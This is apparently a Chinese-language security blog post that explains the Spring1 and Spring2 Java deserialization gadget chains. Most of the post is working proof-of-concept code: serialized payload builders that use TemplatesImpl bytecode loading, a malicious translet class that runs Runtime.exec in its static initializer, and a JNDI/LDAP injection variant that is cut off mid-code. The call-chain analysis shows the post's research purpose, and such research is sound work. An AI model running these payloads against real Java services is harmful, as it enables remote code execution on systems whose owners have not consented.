Spring框架反序列化漏洞分析与利用<\/h1>

前言<\/h2>
本文详细分析Spring框架中的两条反序列化漏洞链（Spring1和Spring2），涵盖漏洞原理、利用条件、调用链分析以及实际利用方法。这两条链都利用了Java动态代理机制和Spring框架特性实现任意代码执行。<\/p>

环境准备<\/h2>

Spring1依赖<\/h3>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-core<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.1.4.RELEASE<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-beans<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.1.4.RELEASE<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>Spring2依赖<\/h3>
<dependencies><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-core<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.1.4.RELEASE<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-beans<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.1.4.RELEASE<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span>    <dependency><\/span>
<\/span><\/span>        <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>        <artifactId><\/span>spring-aop<\/artifactId><\/span>
<\/span><\/span>        <version><\/span>4.1.4.RELEASE<\/version><\/span>
<\/span><\/span>    <\/dependency><\/span>
<\/span><\/span><\/dependencies><\/span>
<\/span><\/span><\/code><\/pre>Spring1链分析<\/h2>
调用链<\/h3>
ObjectInputStream.readObject()
SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.findMethod()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.invokeMethod()
Method.invoke()
Templates(Proxy).newTransformer()
AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
ObjectFactory(Proxy).getObject()
AnnotationInvocationHandler.invoke()
HashMap.get()
Method.invoke()
TemplatesImpl.newTransformer()
TemplatesImpl.getTransletInstance()
TemplatesImpl.defineTransletClasses()
TemplatesImpl.TransletClassLoader.defineClass()
Pwner*(Javassist-generated).<static init>
Runtime.exec()
<\/code><\/pre>
关键点分析<\/h3>


入口点<\/strong>：SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()<\/code><\/p>

通过反射完成方法调用<\/li>
目标是调用TemplatesImpl.newTransformer()<\/code>实现任意类加载<\/li>
<\/ul>
<\/li>

动态代理利用<\/strong>：<\/p>

使用AnnotationInvocationHandler<\/code>作为InvocationHandler<\/li>
通过控制memberValues<\/code>属性返回特定对象<\/li>
需要三层动态代理结构<\/li>
<\/ul>
<\/li>

类型转换问题<\/strong>：<\/p>

getType()<\/code>方法要求返回Type<\/code>类型<\/li>
需要返回同时实现Type<\/code>和Templates<\/code>接口的动态代理对象<\/li>
<\/ul>
<\/li>

关键InvocationHandler<\/strong>：<\/p>

AutowireUtils.ObjectFactoryDelegatingInvocationHandler<\/code><\/li>
其invoke<\/code>方法中method.invoke(this.objectFactory.getObject(), args)<\/code>是关键<\/li>
<\/ul>
<\/li>
<\/ol>
利用POC<\/h3>
package<\/span> org.example;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> org.springframework.beans.factory.ObjectFactory;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.xml.transform.Templates;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Files;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Paths;<\/span>
<\/span><\/span>import<\/span> java.util.Base64;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"E:\\mycode\\tmp\\Test.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        setField(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span> codes);<\/span>
<\/span><\/span>        setField(<\/span>templates,<\/span>"_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>"getObject"<\/span>,<\/span> templates);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        ObjectFactory<?><\/span> objectFactory =<\/span> (<\/span>ObjectFactory<?>)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>ObjectFactory.<\/span>class<\/span>},<\/span> invocationHandler);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor2 =<\/span> clazz.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        constructor2.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler2 =<\/span> (<\/span>InvocationHandler)<\/span> constructor2.<\/span>newInstance<\/span>(<\/span>objectFactory);<\/span>
<\/span><\/span>        
<\/span><\/span>        Type type =<\/span> (<\/span>Type)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>Type.<\/span>class<\/span>,<\/span> Templates.<\/span>class<\/span>},<\/span> invocationHandler2);<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap2.<\/span>put<\/span>(<\/span>"getType"<\/span>,<\/span> type);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler3 =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> hashMap2);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> typeProviderClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$TypeProvider"<\/span>);<\/span>
<\/span><\/span>        Object typeProviderProxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>typeProviderClass},<\/span> invocationHandler3);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> class2 =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor3 =<\/span> class2.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        constructor3.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object object =<\/span> constructor3.<\/span>newInstance<\/span>(<\/span>typeProviderProxy,<\/span> Object.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"toString"<\/span>),<\/span> 0<\/span>);<\/span>
<\/span><\/span>        setField(<\/span>object,<\/span> "methodName"<\/span>,<\/span> "newTransformer"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>object);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> serializedBytes =<\/span> byteArrayOutputStream.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>        String base64Encoded =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>serializedBytes);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>base64Encoded);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> decodedBytes =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>base64Encoded);<\/span>
<\/span><\/span>        ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>decodedBytes));<\/span>
<\/span><\/span>        objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setField<\/span>(<\/span>Object object,<\/span>String fieldName,<\/span>Object value)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Class<?><\/span> c =<\/span> object.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Field field =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>object,<\/span>value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>恶意类示例<\/h3>
package<\/span> org.example;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.DOM;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.TransletException;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Test<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> throws<\/span> TransletException {<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> throws<\/span> TransletException {<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Spring2链分析<\/h2>
调用链<\/h3>
TemplatesImpl.newTransformer()
Method.invoke(Object, Object...)
AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[])
JdkDynamicAopProxy.invoke(Object, Method, Object[])
$Proxy0.newTransformer()
Method.invoke(Object, Object...)
SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(ObjectInputStream)
<\/code><\/pre>
关键点分析<\/h3>


与Spring1的区别<\/strong>：<\/p>

使用JdkDynamicAopProxy<\/code>代替ObjectFactoryDelegatingInvocationHandler<\/code><\/li>
证明ObjectFactoryDelegatingInvocationHandler<\/code>不是唯一选择<\/li>
<\/ul>
<\/li>

关键类<\/strong>：<\/p>

JdkDynamicAopProxy<\/code>：Spring AOP的动态代理实现<\/li>
AdvisedSupport<\/code>：Spring AOP的代理配置管理器<\/li>
<\/ul>
<\/li>

关键调用<\/strong>：<\/p>

AopUtils.invokeJoinpointUsingReflection(target, method, args)<\/code><\/li>
target<\/code>来自targetSource.getTarget()<\/code><\/li>
<\/ul>
<\/li>

配置方式<\/strong>：<\/p>

通过AdvisedSupport.setTargetSource()<\/code>设置目标对象<\/li>
使用SingletonTargetSource<\/code>包装目标对象<\/li>
<\/ul>
<\/li>
<\/ol>
利用POC<\/h3>
package<\/span> org.example;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span>
<\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.framework.AdvisedSupport;<\/span>
<\/span><\/span>import<\/span> org.springframework.aop.target.SingletonTargetSource;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.xml.transform.Templates;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Files;<\/span>
<\/span><\/span>import<\/span> java.nio.file.Paths;<\/span>
<\/span><\/span>import<\/span> java.util.Base64;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Poc<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>        setField(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "aaa"<\/span>);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"E:\\mycode\\tmp\\Test.class"<\/span>));<\/span>
<\/span><\/span>        byte<\/span>[][]<\/span> codes =<\/span> {<\/span>code};<\/span>
<\/span><\/span>        setField(<\/span>templates,<\/span>"_bytecodes"<\/span>,<\/span> codes);<\/span>
<\/span><\/span>        setField(<\/span>templates,<\/span>"_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 配置AdvisedSupport
<\/span><\/span><\/span><\/span>        AdvisedSupport as =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>        as.<\/span>setTargetSource<\/span>(<\/span>new<\/span> SingletonTargetSource(<\/span>templates));<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 创建JdkDynamicAopProxy代理
<\/span><\/span><\/span><\/span>        Class<?><\/span> c =<\/span>Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor =<\/span> c.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>as);<\/span>
<\/span><\/span>        
<\/span><\/span>        Type typeTemplatesProxy =<\/span> (<\/span>Type)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span>
<\/span><\/span>            new<\/span> Class[]{<\/span>Type.<\/span>class<\/span>,<\/span> Templates.<\/span>class<\/span>},<\/span> invocationHandler);<\/span>
<\/span><\/span>        
<\/span><\/span>        Map<<\/span>String,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>"getType"<\/span>,<\/span> typeTemplatesProxy);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> class2 =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor2 =<\/span> class2.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor2.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler2 =<\/span> (<\/span>InvocationHandler)<\/span> constructor2.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> typeProviderClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$TypeProvider"<\/span>);<\/span>
<\/span><\/span>        Object typeProviderProxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>typeProviderClass},<\/span> invocationHandler2);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> class3 =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor3 =<\/span> class3.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        constructor3.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object object =<\/span> constructor3.<\/span>newInstance<\/span>(<\/span>typeProviderProxy,<\/span> Object.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"toString"<\/span>),<\/span> 0<\/span>);<\/span>
<\/span><\/span>        setField(<\/span>object,<\/span> "methodName"<\/span>,<\/span> "newTransformer"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>object);<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> serializedBytes =<\/span> byteArrayOutputStream.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>        String base64Encoded =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>serializedBytes);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>base64Encoded);<\/span>
<\/span><\/span>        
<\/span><\/span>        byte<\/span>[]<\/span> decodedBytes =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>base64Encoded);<\/span>
<\/span><\/span>        ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>decodedBytes));<\/span>
<\/span><\/span>        objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> setField<\/span>(<\/span>Object object,<\/span>String fieldName,<\/span>Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class<?><\/span> c =<\/span> object.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Field field =<\/span> c.<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        field.<\/span>set<\/span>(<\/span>object,<\/span> value);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>攻击面拓展<\/h2>
替代TemplatesImpl的方案<\/h3>
当TemplatesImpl<\/code>类被禁用时，可以考虑使用JNDI注入实现远程类加载。使用com.sun.jndi.ldap.LdapAttribute<\/code>类的getAttributeDefinition()<\/code>方法，该方法会调用lookup()<\/code>。<\/p>
利用POC<\/h3>
package<\/span> org.example;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> org.springframework.beans.factory.ObjectFactory;<\/span>
<\/span><\/span>import<\/span> sun.reflect.ReflectionFactory;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.naming.CompositeName;<\/span>
<\/span><\/span>import<\/span> javax.naming.directory.Attribute;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ByteArrayOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.ObjectOutputStream;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.util.Base64;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Class c1 =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jndi.ldap.LdapAttribute"<\/span>);<\/span>
<\/span><\/span>        Class c2 =<\/span> Class.<\/span>forName<\/span>(<\/span>"javax.naming.directory.BasicAttribute"<\/span>);<\/span>
<\/span><\/span>        Object ldap =<\/span> createObjWithConstructor(<\/span>c1,<\/span>c2,<\/span>new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span>new<\/span> Object[]{<\/span>"6924bf"<\/span>});<\/span>
<\/span><\/span>        setField(<\/span>ldap,<\/span>"rdn"<\/span>,<\/span>new<\/span> CompositeName(<\/span>"a\/\/b"<\/span>));<\/span>
<\/span><\/span>        setField(<\/span>ldap,<\/span>"baseCtxURL"<\/span>,<\/span>"ldap:\/\/127.0.0.1:50389\/"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap.<\/span>put<\/span>(<\/span>"getObject"<\/span>,<\/span> ldap);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> hashMap);<\/span>
<\/span><\/span>        
<\/span><\/span>        ObjectFactory<?><\/span> objectFactory =<\/span> (<\/span>ObjectFactory<?>)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>ObjectFactory.<\/span>class<\/span>},<\/span> invocationHandler);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor2 =<\/span> clazz.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        constructor2.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler2 =<\/span> (<\/span>InvocationHandler)<\/span> constructor2.<\/span>newInstance<\/span>(<\/span>objectFactory);<\/span>
<\/span><\/span>        
<\/span><\/span>        Type type =<\/span> (<\/span>Type)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>Type.<\/span>class<\/span>,<\/span> Attribute.<\/span>class<\/span>},<\/span> invocationHandler2);<\/span>
<\/span><\/span>        
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> hashMap2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        hashMap2.<\/span>put<\/span>(<\/span>"getType"<\/span>,<\/span> type);<\/span>
<\/span><\/span>        InvocationHandler invocationHandler3 =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> hashMap2);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> typeProviderClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$TypeProvider"<\/span>);<\/span>
<\/span><\/span>        Object typeProviderProxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>typeProviderClass},<\/span> invocationHandler3);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class<?><\/span> class2 =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"<\/span>);<\/span>
<\/span><\/span>        Constructor<?><\/span> constructor3 =<\/span> class2.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>        constructor3.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object object =<\/span> constructor3.<\/span>newInstance<\/span>(<\/span>typeProviderProxy,<\/span> Object.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"toString"<\/span>),<\/span> 0<\/span>);<\/span>
<\/span><\/span>        setField(<\/span>object,<\/span> "methodName"<\/span>,<\/span> "getAttributeDefinition"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        ByteArrayOutputStream byteArrayOutputStream =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>byteArrayOutputStream);<\/span>
